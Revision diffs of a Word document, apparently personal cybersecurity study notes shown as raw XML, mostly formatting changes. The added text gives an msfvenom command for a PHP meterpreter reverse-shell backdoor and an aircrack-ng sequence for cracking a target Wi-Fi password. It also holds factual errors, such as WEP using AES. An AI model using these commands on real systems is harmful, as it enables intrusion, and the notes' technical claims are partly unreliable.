     <dgm:pt modelId="{FB9DD9DF-E856-4125-B7F2-5FFADD10B34B}" type="pres">
       <dgm:prSet presAssocID="{E95CE5FF-4FBA-40D2-829D-54F564B6BF8E}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="3" presStyleCnt="5"/>
       <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
     </dgm:pt>
     <dgm:pt modelId="{50CF3BBF-AEA7-45B5-9AEB-E6312F6A7282}" type="pres">
       <dgm:prSet presAssocID="{E13AA509-F635-4BD3-8E3D-1AE8A3F13742}" presName="middleNode" presStyleCnt="0"/>
@@ -16448,10 +16907,24 @@
         </dgm:presLayoutVars>
       </dgm:prSet>
       <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
     </dgm:pt>
     <dgm:pt modelId="{5922692C-701D-4F11-A7C8-902588B2087C}" type="pres">
       <dgm:prSet presAssocID="{698CB340-EE48-4490-B29F-F4E0DBB05DFC}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="4" presStyleCnt="5"/>
       <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
     </dgm:pt>
     <dgm:pt modelId="{61C3E4CA-7425-476B-AD9D-D5AB86098096}" type="pres">
       <dgm:prSet presAssocID="{B170CED5-068A-4D1F-8945-28B6D2132492}" presName="lastNode" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="6" custScaleX="89817" custScaleY="87496">
@@ -16460,6 +16933,13 @@
         </dgm:presLayoutVars>
       </dgm:prSet>
       <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
     </dgm:pt>
   </dgm:ptLst>
   <dgm:cxnLst>
@@ -18582,7 +19062,7 @@
     <w:charset w:val="00"/>
     <w:family w:val="roman"/>
     <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E0002AFF" w:usb1="C0007843" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+    <w:sig w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
   <w:font w:name="Symbol">
     <w:panose1 w:val="05050102010706020507"/>
@@ -18610,14 +19090,14 @@
     <w:charset w:val="00"/>
     <w:family w:val="swiss"/>
     <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E0002AFF" w:usb1="4000ACFF" w:usb2="00000001" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+    <w:sig w:usb0="E0002AFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
   <w:font w:name="Calibri Light">
     <w:panose1 w:val="020F0302020204030204"/>
     <w:charset w:val="00"/>
     <w:family w:val="swiss"/>
     <w:pitch w:val="variable"/>
-    <w:sig w:usb0="A0002AEF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+    <w:sig w:usb0="E0002AFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
 </w:fonts>
 </file>
@@ -18641,6 +19121,7 @@
     <w:rsid w:val="001A5E18"/>
     <w:rsid w:val="00234847"/>
     <w:rsid w:val="00314E12"/>
+    <w:rsid w:val="004E6FD1"/>
     <w:rsid w:val="004F3814"/>
     <w:rsid w:val="005D2E6F"/>
     <w:rsid w:val="006E4C0C"/>
@@ -19380,7 +19861,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{7B84641B-06F3-4F45-96DC-943E968650D4}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{1833CA6D-401B-45F8-A8DA-08669C86A291}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/CyberSecurity.docx
+++ b/CyberSecurity.docx
@@ -16,6 +16,7 @@
         <w:lock w:val="contentLocked"/>
         <w:group/>
       </w:sdtPr>
+      <w:sdtEndPr/>
       <w:sdtContent>
         <w:sdt>
           <w:sdtPr>
@@ -27,6 +28,7 @@
             <w:dataBinding w:xpath="/ns0:BlogPostInfo/ns0:PostTitle" w:storeItemID="{5F329CAD-B019-4FA6-9FEF-74898909AD20}"/>
             <w:text/>
           </w:sdtPr>
+          <w:sdtEndPr/>
           <w:sdtContent>
             <w:p>
               <w:pPr>
@@ -10031,8 +10033,62 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>For creating a payload: msfvenom –p php/meterpreter/reverse_tcp –f raw&gt;filename.php</w:t>
-      </w:r>
+        <w:t xml:space="preserve">For creating a payload: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">msfvenom –p php/meterpreter/reverse_tcp </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> lhost=ip lport=port </w:t>
+      </w:r>
+      <w:r>
+        <w:t>–f raw&gt;filename.php</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>{using venom}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">msfpayload php/meterpreter/reverse_tcp </w:t>
+      </w:r>
+      <w:r>
+        <w:t>lhost=ip lport=port</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> R &gt;filename.php </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>{using payload}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>note that that the system is going to say msfpayload is deprecated but it still works.</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:r>
@@ -10069,8 +10125,6 @@
       <w:r>
         <w:t>Executing this we will get a backdoor.</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p/>
     <w:p/>
@@ -10132,6 +10186,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Wrappers or Binders: these actually have the original software and work naturally.</w:t>
       </w:r>
     </w:p>
@@ -10410,6 +10465,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>One can sniff the following sensitive information from a network −</w:t>
       </w:r>
     </w:p>
@@ -10498,7 +10554,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Telnet passwords</w:t>
       </w:r>
     </w:p>
@@ -10711,6 +10766,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Tear Drop: </w:t>
       </w:r>
       <w:r>
@@ -10750,7 +10806,6 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>BOT NET: This is automated virus. This simply reflects itself and attacks all the victims that are vulnerable and opens the backdoor to the attacker.</w:t>
       </w:r>
     </w:p>
@@ -10879,6 +10934,7 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Char * name ;</w:t>
       </w:r>
     </w:p>
@@ -10894,7 +10950,6 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>command=(char*)malloc(30);</w:t>
       </w:r>
     </w:p>
@@ -19119,6 +19174,7 @@
     <w:rsidRoot w:val="008849E7"/>
     <w:rsid w:val="000337AC"/>
     <w:rsid w:val="001A5E18"/>
+    <w:rsid w:val="001F547F"/>
     <w:rsid w:val="00234847"/>
     <w:rsid w:val="00314E12"/>
     <w:rsid w:val="004E6FD1"/>
@@ -19861,7 +19917,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{1833CA6D-401B-45F8-A8DA-08669C86A291}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{20D0E798-14F5-49F4-850A-844A16D2A6C1}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/CyberSecurity.docx
+++ b/CyberSecurity.docx
@@ -16,7 +16,6 @@
         <w:lock w:val="contentLocked"/>
         <w:group/>
       </w:sdtPr>
-      <w:sdtEndPr/>
       <w:sdtContent>
         <w:sdt>
           <w:sdtPr>
@@ -28,7 +27,6 @@
             <w:dataBinding w:xpath="/ns0:BlogPostInfo/ns0:PostTitle" w:storeItemID="{5F329CAD-B019-4FA6-9FEF-74898909AD20}"/>
             <w:text/>
           </w:sdtPr>
-          <w:sdtEndPr/>
           <w:sdtContent>
             <w:p>
               <w:pPr>
@@ -10068,13 +10066,7 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">msfpayload php/meterpreter/reverse_tcp </w:t>
-      </w:r>
-      <w:r>
-        <w:t>lhost=ip lport=port</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> R &gt;filename.php </w:t>
+        <w:t xml:space="preserve">msfpayload php/meterpreter/reverse_tcp lhost=ip lport=port R &gt;filename.php </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10087,8 +10079,6 @@
       <w:r>
         <w:t>note that that the system is going to say msfpayload is deprecated but it still works.</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:r>
@@ -11038,6 +11028,435 @@
       </w:r>
     </w:p>
     <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>WIFI(801.11)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">We have different wifi(s) based on the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>speeds</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>a: 54 Mbps</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>b: 11 Mbps</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>g: 54 Mbps but in a small spectrum</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>n: 150 Mbps</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>n+: 300 Mbps</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Any wifi device can act as either an </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>access point or a repeater</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Frequency is inversely proportional to distance. This means if your is running on higher frequency the distance it travels is very less. So if we want the signal to penetrate to a larger distance use lower frequencies.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The abbreviation of</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SSID</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is Service Set Identifier.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>When there are a lot of wifi(s) in a single room there is a possibility that they may overlap each other. Now a device accepting the signal gets confused as to which access point it needs to access. To eliminate this we wifi with different channels. This is similar to the channels in your T.V, where we use channels to differentiate the network. In this similar fashioned way we use wifi on different channels when there is a possibility of overlapping to differentiate between them.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5629841" cy="3609975"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="15" name="Picture 15" descr="Image result for overlapping of wifi"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 5" descr="Image result for overlapping of wifi"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId129" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5635202" cy="3613412"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5731510" cy="1211695"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
+            <wp:docPr id="17" name="Picture 17" descr="Image result for overlapping of wifi"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 7" descr="Image result for overlapping of wifi"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId130">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="1211695"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Wifi Security:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="35"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>MAC binding /ACL : This is similar to mac filtering in present scenario, i.e only bind mac address will work on router but there is a possibility of mac spoofing.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="35"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>WEP : Wired Equivalent Privileges. Uses AES algorithm.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="35"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>WPA and WPA2: Wifi Protection Access. WPA2 is just the second generation of WPA. Uses hashing algorithms for passwords.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="35"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>RADIUS: Remote Authentication Dial In User Service. In corporate companies sharing wifi passwords can also lead to data loss or lead to attacks so what they do is use RADIUS protocols. When ever a user asking for a connection to the wifi the router will simply ask for username and password. The router on accepting the credential it will gets it authenticated from the Domain server of the company. The router contains the address of the domain name server.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>wifi hack</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Doing a hack on WPA2 is very difficult but still the WEP and WPA-PSK provide only enough security to stop a newbie to cyber security field.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>To perform the hack we need to have a network wifi card that can be put into monitor mode.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Airmon-ng start wlan0.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Next when the wifi card is in monitor mode capture the packet data using:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Airodump-ng –w wep –c &lt;channel&gt; - -bssid &lt;mac address&gt;  &lt;monitormode instance&gt;.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Here both the channel and the mac address are of the target wifi.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Now to crack the password use aircrack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Aircrack-ng &lt;filename.cap&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>When you store packets the IV{ Initialization Vector}. These contain the passwords encrypted but can be cracked. The WEP cracking is simple if we have traffic but cracking a WAP-PSK is a bit difficult since we need to at least analyse over 40,000 packets.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Some important terms:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Wardriving: cracking w</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ifi while moving fast .</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Warchalking: Mapping of wifi networks with the help of symbols.</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -12089,6 +12508,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="21712F5F"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="001810D6"/>
+    <w:lvl w:ilvl="0" w:tplc="4009000B">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="28755231"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="AEC09966"/>
@@ -12201,7 +12733,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2C533112"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="52DE695A"/>
@@ -12314,7 +12846,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2C80678E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EF66D31E"/>
@@ -12427,7 +12959,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2CB97ECF"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="3D763EB8"/>
@@ -12540,7 +13072,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2EC916C9"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
